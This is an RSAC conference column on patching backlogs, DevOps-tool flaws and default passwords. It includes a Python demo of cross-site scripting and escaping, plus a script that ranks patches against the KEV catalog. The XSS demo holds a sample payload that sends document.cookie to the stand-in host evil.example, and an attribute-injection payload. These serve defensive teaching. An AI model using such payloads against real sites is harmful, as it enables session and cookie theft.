SAN FRANCISCO – In the North and South Halls of the Moscone Center on Monday, RSAC attendees were busy examining the features and benefits of the new products on display, looking to fill gaps in their security programs. But at session breaks and in lunch lines, the conversation turned to human bandwidth: the ability to get known tasks done when unplanned but urgent priorities keep diverting resources and attention away from them, putting the organization’s security posture at risk.
Security teams are concerned that their IT systems still carry exploitable, years-old vulnerabilities that either aren’t patched at all or whose fixes haven’t been rolled out across the organization in a verifiable way. Almost everyone in an informal coffee-line poll mentioned the CISA Top 15 Routinely Exploited Vulnerabilities list and CISA’s Known Exploited Vulnerabilities (KEV) Catalog, and admitted they lacked confidence that their organizations were fully protected against the entries on them.
Industry pros are also concerned about default settings that remain unchanged, and about misconfigurations in software and hardware such as routers and firewalls, which threat actors chain together with other weaknesses and vulnerabilities to stage a successful attack. Critical software supply chain tools introduce vulnerabilities of their own; ironically, the same tools that help companies move faster can also compromise their security.
DevOps tools such as Jenkins, GitLab, Kubernetes, and Docker are critical to the software development and design processes that fuel many businesses. When these crucial tools contain vulnerabilities that open the door to attacks, the responsibility inevitably rolls off the vendor and onto the shoulders of security teams, creating a seemingly endless stream of interruptions that disrupt other priorities.
Developers use Jenkins to build and test software projects with continuous integration, letting them make changes at any stage of the development process and share those changes in a common repository. One of the most frequent classes of vulnerability found in the product is cross-site scripting (XSS), which lets an adversary inject malicious script into web pages viewed by other users, where it runs in their browsers with their session. DevOps teams also use GitLab, and as with Jenkins, unpatched GitLab vulnerabilities that gave attackers a way in turned up in numerous customer pen tests.
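To make the XSS point concrete, here is an added example of a CI-style status page rendered two ways: the vulnerable version that interpolates user input straight into HTML, and the hardened version that encodes for the HTML context. This is illustrative code written for this page, not Jenkins or GitLab code; the page layout, the job names and the two attacker payloads are constructed for the demonstration, and the CSP header values are an assumed baseline policy.

```python
"""Cross-site scripting (XSS) in a CI-style status page: the vulnerable rendering
beside its hardened form. Added illustration; this is not Jenkins or GitLab code.
The page layout, job names and the two attacker payloads are constructed samples."""
import html

# Constructed attacker-controlled input, e.g. a job description that a low-privilege
# user can edit and that an administrator later views in the browser.
PAYLOAD_ELEMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
# Same idea inside an HTML attribute: a double quote closes the attribute, then an
# event handler is added to the element.
PAYLOAD_ATTRIBUTE = '" onmouseover="alert(document.domain)'


def render_vulnerable(job_name: str, description: str) -> str:
    """Interpolates untrusted strings straight into the HTML: the classic XSS bug."""
    return (f'<h1 title="{job_name}">{job_name}</h1>\n'
            f'<p class="desc">{description}</p>')


def render_hardened(job_name: str, description: str) -> str:
    """Encodes each value for the HTML context it is written into. quote=True also
    escapes ' and ", so a value placed in a quoted attribute cannot close it."""
    safe_name = html.escape(job_name, quote=True)
    safe_desc = html.escape(description, quote=True)
    return (f'<h1 title="{safe_name}">{safe_name}</h1>\n'
            f'<p class="desc">{safe_desc}</p>')


def security_headers() -> dict:
    """Defence in depth for the day an encoding bug slips through: a CSP without
    'unsafe-inline' stops an injected <script> block or onmouseover handler from
    executing even if it reaches the page. Assumed baseline policy, not a product's."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_live_markup(rendered: str) -> bool:
    """Rough check used below: does the output still contain a raw <script> tag or an
    unescaped event-handler attribute that a browser would act on?"""
    lowered = rendered.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        print(render.__name__)
        print("  element context injected:  ",
              contains_live_markup(render("build-main", PAYLOAD_ELEMENT)))
        print("  attribute context injected:",
              contains_live_markup(render(PAYLOAD_ATTRIBUTE, "nightly build")))
```

The attribute-context payload is the one that trips up teams who only strip `<script>` tags: no angle brackets are needed, just a stray double quote. Context-aware encoding at the point of output, not input filtering, is what closes both cases, and the CSP is the safety net for the encoding you forgot.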
RSAC attendees also talked about Docker, which packages applications into containers and automates their deployment and management in the cloud. When an app is moved between cloud platforms, the container lets it keep running the same way, so organizational functions continue uninterrupted.
For RSAC attendees and security teams everywhere, I found at least five takeaways from my conversations with people at the show that organizations need to juggle:
- Security teams struggle with patching policies and keeping systems up to date. Vendors say that teams need to “simply” apply the patches or the mitigations and confirm that the issues are fixed. But the sheer volume of the unending patch cycle makes it anything but an easy fix.
- Teams don’t always prioritize the right patches. The IT department might spend its time fixing vulnerabilities that aren’t exploitable in their particular environment or have limited potential impact, while the ones attackers are actually using wait.
- Many companies are stuck with legacy technology. Organizations cannot always upgrade to the latest version because of compatibility issues with older technologies, so they need to segment those systems carefully to limit what a threat actor can reach from them.
- Too many organizations don’t change simple default passwords. IT departments sometimes add new hardware with factory-issued default settings and passwords that are published on the open web, making the devices trivially exploitable.
- Leverage automation to enhance humans, not replace them. Use automation as an enabler. For example, automation can speed up decision-making when under attack, and it can run penetration tests on infrastructure more effectively, separating the vulnerabilities that are actually exploitable from those that don’t deserve the valuable time and attention of our limited security talent.
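The KEV concern raised in the coffee line earlier and the "wrong patches first" takeaway above are two sides of the same problem, and both come down to a sort order. The following is an added example, not code from the page or from CISA or any vendor, that ranks scanner findings by KEV membership before CVSS and flags patches that change management says are applied but the scanner still sees. The feed is a constructed sample using a subset of the public KEV JSON field names; the CVE IDs (CVE-0000-*) are placeholders rather than real vulnerabilities, and the hosts and findings are invented.

```python
"""Patch prioritisation against the CISA Known Exploited Vulnerabilities (KEV) catalog.
Added example, not a CISA or vendor tool. KEV_FEED_JSON is a constructed sample that
uses a subset of the public feed's field names; the CVE IDs (CVE-0000-*) are
placeholders, not real vulnerabilities, and FINDINGS is invented scanner output."""
import json
from datetime import date

# Constructed stand-in for the real feed at
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
KEV_FEED_JSON = json.dumps({
    "title": "constructed sample",
    "vulnerabilities": [
        {"cveID": "CVE-0000-0001", "vendorProject": "ExampleCI", "product": "Server",
         "dateAdded": "2023-01-10", "dueDate": "2023-01-31",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-0000-0002", "vendorProject": "ExampleGit", "product": "CE/EE",
         "dateAdded": "2024-03-01", "dueDate": "2024-03-22",
         "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed scanner output, one row per (host, CVE). "claimed_patched" is what the
# change-management system says; the scanner still detecting the CVE is the truth.
FINDINGS = [
    {"host": "ci-01", "cve": "CVE-0000-0001", "cvss": 8.8, "internet_exposed": True,
     "claimed_patched": True},
    {"host": "git-01", "cve": "CVE-0000-0002", "cvss": 9.9, "internet_exposed": False,
     "claimed_patched": False},
    {"host": "db-07", "cve": "CVE-0000-0003", "cvss": 9.8, "internet_exposed": False,
     "claimed_patched": False},
    {"host": "kiosk-3", "cve": "CVE-0000-0004", "cvss": 4.3, "internet_exposed": True,
     "claimed_patched": False},
]


def load_kev(feed_json: str) -> dict:
    """Index the catalog by CVE ID so each lookup is a dictionary hit."""
    return {v["cveID"]: v for v in json.loads(feed_json)["vulnerabilities"]}


def priority(finding: dict, kev: dict, today: date) -> tuple:
    """Sort key, highest risk first. KEV membership outranks raw CVSS: an actively
    exploited 8.8 beats a 9.8 nobody is known to exploit. Ransomware use and a blown
    CISA due date come next; CVSS and internet exposure only break ties."""
    entry = kev.get(finding["cve"])
    in_kev = entry is not None
    ransomware = in_kev and entry.get("knownRansomwareCampaignUse") == "Known"
    overdue = in_kev and date.fromisoformat(entry["dueDate"]) < today
    return (in_kev, ransomware, overdue, finding["cvss"], finding["internet_exposed"])


def rank_findings(findings: list, kev: dict, today: date) -> list:
    """Findings in the order they should be patched."""
    return sorted(findings, key=lambda f: priority(f, kev, today), reverse=True)


def unverified_patches(findings: list) -> list:
    """Rows where the organisation believes the fix is in but the scanner disagrees:
    the 'not rolled out in a verifiable way' gap."""
    return [f for f in findings if f["claimed_patched"]]


def ranked_hosts(today_iso: str = "2024-06-01") -> list:
    """Convenience wrapper over the constructed data: host names in patch order."""
    kev = load_kev(KEV_FEED_JSON)
    return [f["host"] for f in rank_findings(FINDINGS, kev, date.fromisoformat(today_iso))]


if __name__ == "__main__":
    kev = load_kev(KEV_FEED_JSON)
    today = date(2024, 6, 1)
    for f in rank_findings(FINDINGS, kev, today):
        in_kev, ransomware, overdue, cvss, exposed = priority(f, kev, today)
        print(f"{f['host']:8} {f['cve']}  kev={in_kev!s:5} ransomware={ransomware!s:5} "
              f"overdue={overdue!s:5} cvss={cvss} exposed={exposed}")
    for f in unverified_patches(FINDINGS):
        print(f"VERIFY: {f['host']} claims {f['cve']} is patched but it is still detected")
```

With the constructed data the order comes out as ci-01, git-01, db-07, kiosk-3: the internet-facing CI server with a ransomware-linked, overdue KEV entry first, the 9.8 that appears in no exploitation catalog third. The verification pass is the part most teams skip; a patch ticket closed in the CMDB is not evidence, a clean rescan is.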
We need to let our precious security talent work on higher-level issues, analyzing where the next attacks will come from. By using automation more strategically, we can tilt the age-old cat-and-mouse adversarial game in favor of the defenders.
Snehal Antani, co-founder and CEO, Horizon3.ai